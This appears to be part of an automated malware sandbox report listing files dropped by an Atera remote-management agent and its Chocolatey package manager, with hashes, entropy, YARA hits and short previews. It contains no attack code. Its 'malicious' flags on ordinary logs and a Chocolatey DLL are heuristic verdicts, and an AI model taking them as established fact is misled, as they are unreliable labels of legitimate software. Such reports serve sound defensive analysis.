                                                                                                                                                                                                                                                                                              Entropy (8bit):4.964095524722814
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:pem717f8PV7UQQ6em717f8PV7Up9pC7iBd6Fg/HtFRIk:pVR897v7VR897gp8iBLtFl
                                                                                                                                                                                                                                                                                              MD5:D26A63F79FD944757840BF05C91B0948
                                                                                                                                                                                                                                                                                              SHA1:6DFC731A36043ADBED6BD399432766CAE6549BC0
                                                                                                                                                                                                                                                                                              SHA-256:104A40EAB8F26958A0E6B0EF96607F727F1EA0D8B961F6318ABA77C74E1CAB61
                                                                                                                                                                                                                                                                                              SHA-512:519F19E8BAEF6A91668DF37828D8C45248342C2DF5679397425CC317B6857B5078240CEB9B6957FD37AB081162673F1077428792A8D02C7102C2BA33D5D699EA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\01-06-2025 06_59_15-log.txt, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...Enabled allowGlobalConfirmation..Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...0 packages installed.....Did you know Pro / Business automatically syncs with Programs and.. Features? Learn more about Package Synchronizer at.. https://chocolatey.org/compare..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\01-06-2025 06_59_25-log.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):275
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.877907726544251
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:tVb5kBm7ObCDL7fsDPV7gRoUvlwTS7v33LQ7mLLlGKACCWOKEe:pem717f8PV7UO+fo6BNVB
                                                                                                                                                                                                                                                                                              MD5:DA74935F66150D0D5B81820876FB7CF6
                                                                                                                                                                                                                                                                                              SHA1:72C2E449991D8AC8475D975278DA19E5ECD22602
                                                                                                                                                                                                                                                                                              SHA-256:784F35617FF7C184384B9710C94709F9A55F3FABF51DC8A68C5429BC5A595E2D
                                                                                                                                                                                                                                                                                              SHA-512:A37949ADC8B72F522CCE6875090585A47809E9CB3A269036BF2F318BE87AC189178DB2258410EC4EFADAA5E878074D027A6EE7FEB0C29827546270BD46CA904C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\01-06-2025 06_59_25-log.txt, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\01-06-2025 06_59_25-log.txt, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...Outdated Packages.. Output is package name | current version | available version | pinned?......Chocolatey has determined 0 package(s) are outdated. ..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):6655016
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.267118093322128
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:98304:jCMEM0MUMRMxMwMkfqbjxbSzGVr4W11ByHY4W6upIjD:jlV1qKpkfqbjeGVr4NHYJ60iD
                                                                                                                                                                                                                                                                                              MD5:C4AD1B5AFC9FC19605C1D18D32CF30A8
                                                                                                                                                                                                                                                                                              SHA1:7950FC1B7E17E740F3B0F88CD746238A48ABF645
                                                                                                                                                                                                                                                                                              SHA-256:27847B79721CDA829F662198CB36C053B458635BE3E85E9A9265BDF9D37B33C0
                                                                                                                                                                                                                                                                                              SHA-512:38DC58B27393488DF69A3378AB2BC250367186912FC4F7D9D3A3AD1C882763F36E22E2FB2056CEF345B4C13A2930D9A16E556054593577DCEBE5D71258120B4B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Db........... ......c..........c.. ....c...@.. ........................e.....V!f...@...................................c.L.....c..............de.((....e.......c...............................................c.............. ..H............text...w.c.. ....c................. ..`.rsrc.........c.......c.............@..@.reloc........e......be.............@..B................H.........A...!.........H....3..........................................0..T.......r...p...o......9,....s......o......o.....o..........9.....o...........9.....o......*.........3..........7E......"..o....*...b.:....~....*.o....(....*....0..s........:....~....*.o......9......i:....~....*.~....:...........s.........~....(...+~....:...........s.........~....(...+*.....6..r...p(....*.."..(....*...:.(......}....*..0..+.......s.2.....}.....r...pr...p... 2..s....o....&*......0..{........o..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\config\chocolatey.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9382
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.897728965151623
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:rwhyxWvf7L6ZaBbrzRmXBzCWKZD68NJ+IK2E8V1ExAuVXI4n7rJ+ZXVx:sjL6ZiHt6B+WshDK2EiEJ7lEFx
                                                                                                                                                                                                                                                                                              MD5:14FFCF07375B3952BD3F2FE52BB63C14
                                                                                                                                                                                                                                                                                              SHA1:AB2EADDE4C614EB8F1F2CAE09D989C5746796166
                                                                                                                                                                                                                                                                                              SHA-256:6CCFDB5979E715D12E597B47E1D56DB94CF6D3A105B94C6E5F4DD8BAB28EF5ED
                                                                                                                                                                                                                                                                                              SHA-512:14A32151F7F7C45971B4C1ADFB61F6AF5136B1DB93B50D00C6E1E3171E25B19749817B4E916D023EE1822CAEE64961911103087CA516CF6A0EAFCE1D17641FC4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<chocolatey xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <config>.. <add key="cacheLocation" value="" description="Cache location if not TEMP folder. Replaces `$env:TEMP` value for choco.exe process. It is highly recommended this be set to make Chocolatey more deterministic in cleanup." />.. <add key="containsLegacyPackageInstalls" value="true" description="Install has packages installed prior to 0.9.9 series." />.. <add key="commandExecutionTimeoutSeconds" value="2700" description="Default timeout for command execution. '0' for infinite (starting in 0.10.4)." />.. <add key="proxy" value="" description="Explicit proxy location. Available in 0.9.9.9+." />.. <add key="proxyUser" value="" description="Optional proxy user. Available in 0.9.9.9+." />.. <add key="proxyPassword" value="" description="Optional proxy password. Encrypted. Available in 0.9.9.9+." />.. <add key

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\config\chocolatey.config.3248.update

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9382
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.897728965151623
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:rwhyxWvf7L6ZaBbrzRmXBzCWKZD68NJ+IK2E8V1ExAuVXI4n7rJ+ZXVx:sjL6ZiHt6B+WshDK2EiEJ7lEFx
                                                                                                                                                                                                                                                                                              MD5:14FFCF07375B3952BD3F2FE52BB63C14
                                                                                                                                                                                                                                                                                              SHA1:AB2EADDE4C614EB8F1F2CAE09D989C5746796166
                                                                                                                                                                                                                                                                                              SHA-256:6CCFDB5979E715D12E597B47E1D56DB94CF6D3A105B94C6E5F4DD8BAB28EF5ED
                                                                                                                                                                                                                                                                                              SHA-512:14A32151F7F7C45971B4C1ADFB61F6AF5136B1DB93B50D00C6E1E3171E25B19749817B4E916D023EE1822CAEE64961911103087CA516CF6A0EAFCE1D17641FC4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<chocolatey xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <config>.. <add key="cacheLocation" value="" description="Cache location if not TEMP folder. Replaces `$env:TEMP` value for choco.exe process. It is highly recommended this be set to make Chocolatey more deterministic in cleanup." />.. <add key="containsLegacyPackageInstalls" value="true" description="Install has packages installed prior to 0.9.9 series." />.. <add key="commandExecutionTimeoutSeconds" value="2700" description="Default timeout for command execution. '0' for infinite (starting in 0.10.4)." />.. <add key="proxy" value="" description="Explicit proxy location. Available in 0.9.9.9+." />.. <add key="proxyUser" value="" description="Optional proxy user. Available in 0.9.9.9+." />.. <add key="proxyPassword" value="" description="Optional proxy password. Encrypted. Available in 0.9.9.9+." />.. <add key

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\config\chocolatey.config.backup (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9382
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.897728965151623
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:rwhyxWvf7L6ZaBbrzRmXBzCWKZD68NJ+IK2E8V1ExAuVXI4n7rJ+ZXVx:sjL6ZiHt6B+WshDK2EiEJ7lEFx
                                                                                                                                                                                                                                                                                              MD5:14FFCF07375B3952BD3F2FE52BB63C14
                                                                                                                                                                                                                                                                                              SHA1:AB2EADDE4C614EB8F1F2CAE09D989C5746796166
                                                                                                                                                                                                                                                                                              SHA-256:6CCFDB5979E715D12E597B47E1D56DB94CF6D3A105B94C6E5F4DD8BAB28EF5ED
                                                                                                                                                                                                                                                                                              SHA-512:14A32151F7F7C45971B4C1ADFB61F6AF5136B1DB93B50D00C6E1E3171E25B19749817B4E916D023EE1822CAEE64961911103087CA516CF6A0EAFCE1D17641FC4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<chocolatey xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <config>.. <add key="cacheLocation" value="" description="Cache location if not TEMP folder. Replaces `$env:TEMP` value for choco.exe process. It is highly recommended this be set to make Chocolatey more deterministic in cleanup." />.. <add key="containsLegacyPackageInstalls" value="true" description="Install has packages installed prior to 0.9.9 series." />.. <add key="commandExecutionTimeoutSeconds" value="2700" description="Default timeout for command execution. '0' for infinite (starting in 0.10.4)." />.. <add key="proxy" value="" description="Explicit proxy location. Available in 0.9.9.9+." />.. <add key="proxyUser" value="" description="Optional proxy user. Available in 0.9.9.9+." />.. <add key="proxyPassword" value="" description="Optional proxy password. Encrypted. Available in 0.9.9.9+." />.. <add key

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\ChocolateyTabExpansion.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (965), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12946
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.132019659587194
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ctpHjcTfbZO0g2ZyAvGZkAsoXCxAziDR/67E4Pb:ctpDBCvGZkAsCCxAziDR/sF
                                                                                                                                                                                                                                                                                              MD5:0BB54C9DA241E0EAAFB6C976AC07EAA7
                                                                                                                                                                                                                                                                                              SHA1:045808C9106A4C356AB15A2D8680FDB737DC98A6
                                                                                                                                                                                                                                                                                              SHA-256:071CE6FCE85051E373C1B05BB82A92FFB8BEBF34C768B7A2F6E809000A78479F
                                                                                                                                                                                                                                                                                              SHA-512:C118C9FEC5903D1F2F6A6FA070130FCEBAAD70AF3459DA82069C5C8ED3D66CEE374C098C6247CCD528187B6856FAA458EBBD8B6F2C0C68C2A5B8EF32C2D7CD75
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....# Ideas from the Awesome Posh-Git - https://github.com/dahlbyk/posh-git..# Posh-Git License - https://github.com/dahlbyk/posh-git/blob/1941da2472eb668cde2d6a5fc921d5043a024386/LICENSE.txt..# http://www.jeremyskinner.co.uk/2010/03/07/using-git-with-windows-powershell/....$Global:ChocolateyTabSettings = New-Object PSObject -P

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\chocolateyInstaller.psm1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3903
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.986280475081154
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKoqWJBYc4R2wf3TQJb3jl7t3iv:cSyL+QGXHMWJB7VFUv
                                                                                                                                                                                                                                                                                              MD5:1CF35331F337493A5B5B8C482E32B507
                                                                                                                                                                                                                                                                                              SHA1:149D5B5ABB4FF20CFAA333946BAAEC6B8EFA5630
                                                                                                                                                                                                                                                                                              SHA-256:CCF763934E3801002C260246316DF70C64C66E7721C24B300C634567F5885A39
                                                                                                                                                                                                                                                                                              SHA-512:03652CA25D2A78860F735B57600B940D2723DD23E24A2632D5CA76DBFACBF95CD1090428FB6AC23BF945AB20C1C201155CF26161361853DB94A5D85AE753C0A1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....$helpersPath = Split-Path -Parent $MyInvocation.MyCommand.Definition....$global:DebugPreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentDebug -eq 'true') {.. $global:DebugPrefe

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\chocolateyProfile.psm1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1178
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.161789340951933
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:cSyJ3554IpgyZA0SU0E+SlHQk1GpsLAjQSDg6pucReEe7:cSyX54pyFd0AlH31KoLKRed
                                                                                                                                                                                                                                                                                              MD5:610AD6370C8DACB3861200B8827DF768
                                                                                                                                                                                                                                                                                              SHA1:E6831DF0C1ADB4664BDE6D2D48DCE28CC1918A83
                                                                                                                                                                                                                                                                                              SHA-256:B06996C9A26663FCF41B2406D12C4597075AB7F94CDD320EEE64EAC9AEA95DFD
                                                                                                                                                                                                                                                                                              SHA-512:C3A30128443E47D5D38CFD8C989E8317668EEDA6B4E85BEE94B76034479DEC0BED4C980ACD797153259CF0DF2807E79C3B3F4AAADF21E255A35BBDBE2F2E16E9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# ..# You may obtain a copy of the License at..# ..# http://www.apache.org/licenses/LICENSE-2.0..# ..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....if (Get-Module chocolateyProfile) { return }....$thisDirectory = (Split-Path -parent $MyInvocation.MyCommand.Definition)..... $thisDirectory\functions\Write-FunctionCallLogMessage.ps1... $thisDirectory\functions\Get-EnvironmentVariable.ps1... $thisDirectory\functions\Get-EnvironmentVariableNames.ps1... $thisDirectory\fun

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\chocolateyScriptRunner.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2892
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.176658574720988
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:RkBibyQwcYIRQcRwAshP5l8kRMCpEMwK/JvoPEY0nzWBIxjO0L5E8bWHtt6rh4:eiAc5HGAshhCQMChR/JsZYzWBeO85Ecm
                                                                                                                                                                                                                                                                                              MD5:EF32E09F41D2F8234E4482C6B52FFFB1
                                                                                                                                                                                                                                                                                              SHA1:446185592825F7B7894CC5A9E2FCB4F015B9E810
                                                                                                                                                                                                                                                                                              SHA-256:ACC5E8AB085FDD00B1C333853D74B1EC15777212A435C2DE8B56A490BE07103C
                                                                                                                                                                                                                                                                                              SHA-512:7273DE65F571C4302BAC73C3FA3AEBDB7887B923EABAC10457C2A2C329B67979726440ED0C5E190C7728676D9382D4C8E2F4D030336630BC82AC7AE2FB20B58F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.param(.. [alias("ia","installArgs")][string] $installArguments = '',.. [alias("o","override","overrideArguments","notSilent")].. [switch] $overrideArgs = $false,.. [alias("x86")][switch] $forceX86 = $false,.. [alias("params","parameters","pkgParams")][string]$packageParameters = '',.. [string]$packageScript..)....$global:DebugPreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentDebug -eq 'true') { $global:DebugPreference = "Continue"; }..$global:VerbosePreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentVerbose -eq 'true') { $global:VerbosePreference = "Continue"; $verbosity = $true }....Write-Debug '---------------------------Script Execution---------------------------'..Write-Debug "Running 'ChocolateyScriptRunner' for $($env:packageName) v$($env:packageVersion) with packageScript `'$packageScript`', packageFolder:`'$($env:packageFolder)`', installArguments: `'$installArguments`', packageParameters: `'$packageParameters`',"....## Set the culture to invar

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Format-FileSize.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1751
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.27319452124258
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:cSyJ3554IpXAAyU0E+SlHQk1GpsLAKFoYlMp9TlxNAZiTxGEXL5FGX/OFchWoCah:cSyX54q90AlH31Koyh9xnFVVc/4oqPli
                                                                                                                                                                                                                                                                                              MD5:12E0A95C9BD0A49DA769C2927C648DFB
                                                                                                                                                                                                                                                                                              SHA1:33174164C23D10B43E26CEE56E1A6FB60E8D9F4D
                                                                                                                                                                                                                                                                                              SHA-256:3A2A002BD7213ECCE52FB82C470B824770A11DEB0A33DDB319A24824CE4676DA
                                                                                                                                                                                                                                                                                              SHA-512:D19E22031409B216A10815FE606852712EF0136B9056541774DC66AE9C57994DE5A667AE1F925D547D1BCCF6AE9221D939F7CE2BFC87ABC98C634858E1CCAA7B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....Function Format-FileSize {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Formats file size into a human readable format......NOTES..Available in 0.9.10+.....This function is not part of the API......INPUTS..None.....OUTPUTS..Returns a string representation of the file size in a more friendly..form

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-CheckSumValid.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (505), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11504
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.008896354130034
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSyL+QGXHpi+o8HrDe07ZUWKVjakELFiuPOizDIinqSQ/fa:ctL+QGwKS07ZUOZPpDDyfa
                                                                                                                                                                                                                                                                                              MD5:9443CB695D075DAA7DE91510A1E35C14
                                                                                                                                                                                                                                                                                              SHA1:7676604D3C1F0BD26632DC41FCF1310908D422C6
                                                                                                                                                                                                                                                                                              SHA-256:7095FB2F3F44FEE977D3B53DEE93B952D04325108B090F5F7E8503F758C27F18
                                                                                                                                                                                                                                                                                              SHA-512:2D0B8C3345B6573F56A54D357BB700D83B3AB5A40DED0AA2DC5A40DAC0523DB86BBC5BAA10CB3B4B1785123B8F32CEC5A86F350AF315A2BFF6885C08BD77758F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChecksumValid {..<#...SYNOPSIS..Checks a file's checksum versus a passed checksum and checksum type......DESCRIPTION..Makes a determination if a file meets an expected checksum s

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyUnzip.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10482
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.191184135569746
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSyL+QGXHphcdudY/xIVBO6zgV6ZlR86nFTDzH0sQsPbnJ8Yc9bTp05va:ctL+QGTqudY/xcBOSt3XHRJNva
                                                                                                                                                                                                                                                                                              MD5:F740F29F0AC79C7E5BA69B1CF3E6DC74
                                                                                                                                                                                                                                                                                              SHA1:8F609B5BDCCE295AEF29011858B31608D26E8E04
                                                                                                                                                                                                                                                                                              SHA-256:550231F4568914C786BF3BDE0FF4897DCE761084D33CFA6D8FD462B34A779D88
